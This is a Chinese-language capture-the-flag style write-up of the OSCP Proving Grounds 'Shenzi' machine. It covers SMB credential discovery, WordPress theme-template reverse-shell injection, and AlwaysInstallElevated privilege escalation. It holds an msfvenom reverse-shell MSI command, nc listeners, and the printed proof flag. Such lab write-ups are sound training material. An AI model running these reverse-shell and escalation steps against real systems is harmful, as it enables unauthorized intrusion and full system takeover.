OSCP - Proving Grounds

OSCP - Proving Grounds - Shenzi

主要知識點

路徑爆破小技巧
windows?AlwaysInstallElevated 提權

具體步驟

依舊是nmap開始，其中80/443/139/445端口值得關注一下

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 15:06 UTC
Nmap scan report for 192.168.53.55
Host is up (0.00081s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.53.55/dashboard/
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.53.55/dashboard/
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.49.53' is not allowed to connect to this MariaDB server
5040/tcp  open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/1%Time=67755A0E%P=x86_64-pc-linux-gnu%r(
SF:NULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.53'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

利用smbclient來嘗試連接并下載文件，其中passwords.txt比較有用，看起來安裝了一個wordpress，一個mysql/maria,不過mysql/maria db是無法從其他網絡連接的

C:\home\kali\Documents\OFFSEC\GoToWork\Shenzi> smbclient -L  //192.168.238.55     
Password for [WORKGROUP\kali]:Sharename       Type      Comment---------       ----      -------IPC$            IPC       Remote IPCShenzi          Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.238.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableC:\home\kali\Documents\OFFSEC\GoToWork\Shenzi> smbclient //192.168.238.55/Shenzi -N
Try "help" to get a list of possible commands.
smb: \> list
0:      server=192.168.238.55, share=Shenzi
smb: \> ls.                                   D        0  Thu May 28 23:45:09 2020..                                  D        0  Thu May 28 23:45:09 2020passwords.txt                       A      894  Thu May 28 23:45:09 2020readme_en.txt                       A     7367  Thu May 28 23:45:09 2020sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 23:45:09 2020why.tmp                             A      213  Thu May 28 23:45:09 2020xampp-control.ini                   A      178  Thu May 28 23:45:09 202012941823 blocks of size 4096. 6499253 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 894 as passwords.txt (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \> get readme_en.txt
getting file \readme_en.txt of size 7367 as readme_en.txt (14.3 KiloBytes/sec) (average 7.8 KiloBytes/sec)
smb: \> get sess_klk75u2q4rpgfjs3785h6hpipp 
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (7.5 KiloBytes/sec) (average 7.7 KiloBytes/sec)
smb: \> get why.tmp
getting file \why.tmp of size 213 as why.tmp (0.4 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \> get xampp-control.ini
getting file \xampp-control.ini of size 178 as xampp-control.ini (0.4 KiloBytes/sec) (average 5.0 KiloBytes/sec)
smb: \> exit

嘗試了各種字典都有任何有價值的線索，查了一下別人的walkthrough才知道有一個shenzi路徑，這個路徑在常用的字典里是沒有的，看起來當你實在爆破不出東西的時候，試試靶機的名字吧。

利用passwords.txt中的密碼可以登錄，一般來講wordpress在用admin登錄以后都可以通過修改themes文件或者上傳theme zip包來創建reverse shell,不過上傳theme zip包會報錯，不過可以通過修改現有theme的文件來創建reverse shell，不過這里沒法使用kali自帶的 php-reverse-shell.php，但是咱們可以通過Online - Reverse Shell Generator來生成一個

之后覆蓋掉默認theme中的404 template

在本地啟動nc -nlvp 80之后，我們就可以訪問http://192.168.215.55/shenzi/abc?來創建reverse shell,

C:\home\kali\Documents\OFFSEC\GoToWork\Shenzi> nc -nlvp 80 
listening on [any] 80 ...
connect to [192.168.45.161] from (UNKNOWN) [192.168.215.55] 50025
SOCKET: Shell has connected! PID: 1156
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.C:\xampp\htdocs\shenzi>cd C:\Users\Shenzi

之類我們先上傳winPEASx64.exe來收集一下信息,得到有用的信息，可能我用的winPEASx64.exe版本比較老下面的link不好用，可用的link是Windows Local Privilege Escalation - HackTricks

����������? Checking AlwaysInstallElevated
�  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevatedAlwaysInstallElevated set to 1 in HKLM!AlwaysInstallElevated set to 1 in HKCU!

基本的意思是，如果兩個注冊表項的 AlwaysInstallElevated 是激活的狀態，就會允許任意用戶以Administrator的身份執行msi文件，雖然文章里是利用msfvenom生成創建用戶的msi，我們可以通過生成創建reverse shell的msi來獲得Administrator權限

C:\home\kali\Documents\OFFSEC\GoToWork\Shenzi> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.161 LPORT=443 -f msi -o RevShell.msi
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: RevShell.msi

在本地執行nc -nlvp 443后上傳RevShell.msi并在remote server上執行，提權成功

C:\home\kali\Documents\OFFSEC\GoToWork\Shenzi> nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.161] from (UNKNOWN) [192.168.215.55] 50647
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.C:\WINDOWS\system32>whoami
whoami
nt authority\systemC:\WINDOWS\system32>cd C:\Users\Administrator
cd C:\Users\AdministratorC:\Users\Administrator>cd Desktop
cd DesktopC:\Users\Administrator\Desktop>dir
dirVolume in drive C has no label.Volume Serial Number is E24B-9BB9Directory of C:\Users\Administrator\Desktop04/12/2022  10:03 AM    <DIR>          .
04/12/2022  10:03 AM    <DIR>          ..
01/03/2025  03:51 AM                34 proof.txt1 File(s)             34 bytes2 Dir(s)  26,628,440,064 bytes freeC:\Users\Administrator\Desktop>type proof.txt
type proof.txt
f2115ae86db22788d59629c1fac5d7b0

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/94002.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/94002.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/94002.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！